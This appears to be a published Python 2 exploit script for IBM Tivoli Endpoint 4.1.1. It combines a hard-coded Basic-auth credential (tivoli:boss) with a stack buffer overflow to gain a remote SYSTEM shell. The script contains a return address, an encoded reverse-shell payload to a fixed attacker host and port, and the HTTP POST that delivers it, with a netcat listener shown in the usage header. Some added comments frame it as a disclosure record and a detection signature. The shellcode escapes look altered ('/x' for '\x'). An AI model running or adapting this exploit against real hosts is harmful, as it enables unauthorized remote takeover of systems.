
# Title : IBM Tivoli Endpoint 4.1.1 Remote SYSTEM Exploit
# Published : 2011-06-07
# Author : Jeremy Brown


			
#!/usr/bin/python
# tiv-sys.py
# IBM Tivoli Endpoint 4.1.1 Remote SYSTEM Exploit
# Jeremy Brown [0xjbrown41-gmail-com]
# June 2011
#
# Discovered by: Brian Adeloye of Tenable Network Security
#
# This exploit makes use of two vulnerabilities:
#
# 1) Base64 authentication credentials hard-coded in lcfd.exe
# 2) Stack-based buffer overflow when parsing HTTP variable values
#
# Tested on Tivoli Endpoint 4.1.1-LCF-0048 running on Windows XP SP3
#
# $ python tiv-sys.py 192.168.0.188
# .....
# $ nc -v -l 4444
# Connection from 192.168.0.188 port 4444 [tcp/*] accepted
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:/Program Files/Tivoli/lcf/dat/1>
#
# References:
#
# http://www.zerodayinitiative.com/advisories/ZDI-11-169/
# https://www-304.ibm.com/support/docview.wss?uid=swg21499146
#
# NOTE(review): Python 2 script (print statement, httplib, urllib.urlencode).
# Read it as a record of the weakness class, not as a template: the two
# defects it chains are (a) a fixed Basic-auth credential compiled into the
# agent, so the HTTP handler is reachable by anyone who knows the constant,
# and (b) unbounded copying of a form-variable value on the stack. The IBM
# reference above is the vendor fix; the ZDI advisory is the disclosure.
import sys
import struct
import socket
import httplib
import urllib

# Agent's HTTP listener; overridable via the optional second CLI argument.
port=9495
# Return address overwrite. A fixed module address only works on the exact
# build noted above (XP SP3, no ASLR) -- presumably chosen from that image.
ret=0x7C96BF33 # jmp esp @ user32.dll
# Filler that reaches the saved return address; 256 is the tested offset,
# which pins the overflowed buffer size on this build.
junk="B"*256

# windows/shell_reverse_tcp - 333 bytes
# http://www.metasploit.com
# Encoder: x86/countdown
# LHOST=192.168.0.198, LPORT=4444, ReverseConnectRetries=5, 
# EXITFUNC=thread, InitialAutoRunScript=, AutoRunScript=
# The payload is a generated reverse shell to the hard-coded LHOST/LPORT above;
# the bytes are reproduced exactly as the page renders them.
payload=(
"/x2b/xc9/x66/xb9/x39/x01/xe8/xff/xff/xff/xff/xc1/x5e/x30"
"/x4c/x0e/x07/xe2/xfa/xfd/xea/x8a/x04/x05/x06/x67/x81/xec"
"/x3b/xd9/x68/x86/x5c/x3f/x9b/x43/x1e/x98/x46/x01/x9d/x65"
"/x30/x16/xad/x51/x3a/x2c/xe1/x2e/xe0/x8d/x1e/x42/x58/x27"
"/x0a/x07/xe9/xe6/x27/x2a/xeb/xcf/xde/x7d/x67/xba/x60/x23"
"/xbf/x77/x0a/x36/xe8/xb2/x7a/x43/xb9/xfd/x4a/x75/x41/x91"
"/x12/xc8/x0c/x5d/xcd/x1f/x68/x48/x99/xa8/x70/x04/xc5/x7b"
"/xdb/x50/x84/x62/xab/x64/x96/xfb/x99/x96/x57/x5a/x9b/x65"
"/xbe/x2a/x94/x62/x1f/x9b/x5f/x18/x42/x12/x8a/x31/xe1/x33"
"/x48/x6c/xbd/x09/xfb/x7d/x39/xf8/x2c/x69/x77/xa4/xf3/x7d"
"/xf1/x7a/xac/xf4/x3a/x5b/xa4/xda/xd9/xe2/xdd/xdf/xd7/x78"
"/x68/xd1/xd5/xd1/x07/x9f/x65/x09/xcd/xf9/xa1/xa1/x94/x95"
"/xfe/xe0/xeb/xab/xc5/xcf/xf4/xd1/xe9/xb9/xa7/x5e/x77/x1b"
"/x34/xa4/xa6/xa7/x81/x6d/xfe/xfb/xc4/x84/x2e/xc4/xb0/x4e"
"/x67/xe3/xe4/xe5/xe6/xf7/xe8/xf9/xea/xd3/x56/xb2/x61/x5f"
"/x3f/x14/x4b/x04/xac/x05/x6e/xc7/x0e/xa1/xc8/xcb/xdd/x91"
"/x47/x29/xba/xc1/x84/x84/xbc/x4c/x73/xa3/xb9/x26/x0f/xb3"
"/xbf/xb0/xba/xdf/x69/x02/xb5/xb4/xb3/xd4/x10/x8d/xfa/xb0"
"/xbc/x09/x11/x8b/x29/xab/xd4/xcd/xf3/xf2/x79/xb1/xd2/xe7"
"/x3e/xf9/xbe/xaf/xac/xab/xa8/xa9/x46/x57/x4c/x55/x52/x56"
"/x50/x6f/x71/xc5/x35/x8d/xf3/xd8/x87/xef/x5e/x47/x54/xec"
"/x24/x7d/x1e/x90/x05/x79/xe5/xce/xa7/xfd/x03/x35/x2a/x49"
"/x84/xb6/x99/xb8/xd9/xf2/x14/x2f/x56/x21/xac/xd6/xce/x5a"
"/x35/x8a/x75/x20/x46/x5a/x5c/x37/x6b/xc6/xef")

# Usage: <target> [port]; exits with status 0 even on a usage error.
if len(sys.argv)<2:
     print "Usage: "+sys.argv[0]+" <target> [port]"
     sys.exit(0)

target=sys.argv[1]

# A third argument is only honored when exactly three are given; extra
# arguments are silently ignored.
if len(sys.argv)==3:
     port=int(sys.argv[2])

# Little-endian 32-bit pack of the return address (x86 stack layout).
retaddr=struct.pack("<L",ret)
# Single form variable "test" whose value is filler + return address + payload;
# the overflow is in the server's handling of the *value*, per the header.
data=urllib.urlencode({"test":junk+retaddr+payload})
# Content-Length is computed from the raw (pre-urlencode) lengths, so it only
# matches the encoded body when urlencode leaves every byte unchanged -- which
# is not the case for a string containing '/'. Left as the author wrote it.
size=5+len(junk)+len(retaddr)+len(payload) # 'test=' = 5 (also works with just '=')
# Basic credential is the constant baked into lcfd.exe (see header). For
# defenders: a POST to /addr on 9495/tcp carrying exactly this Authorization
# header, or any oversized form value, is the signature of this issue; the
# "Host" value is arbitrary. Content-Length is passed as an int and relies on
# httplib stringifying header values -- presumably fine on 2.7, unverified.
hdrs={"Host":"pw.n","Content-Length":size,"Authorization":"Basic dGl2b2xpOmJvc3M="} # tivoli:boss
# Fire-and-forget: the response is never read, and the connection is closed
# immediately, so no success/failure is reported to the caller.
conn=httplib.HTTPConnection(target,port)
conn.request("POST","/addr",data,hdrs)
conn.close()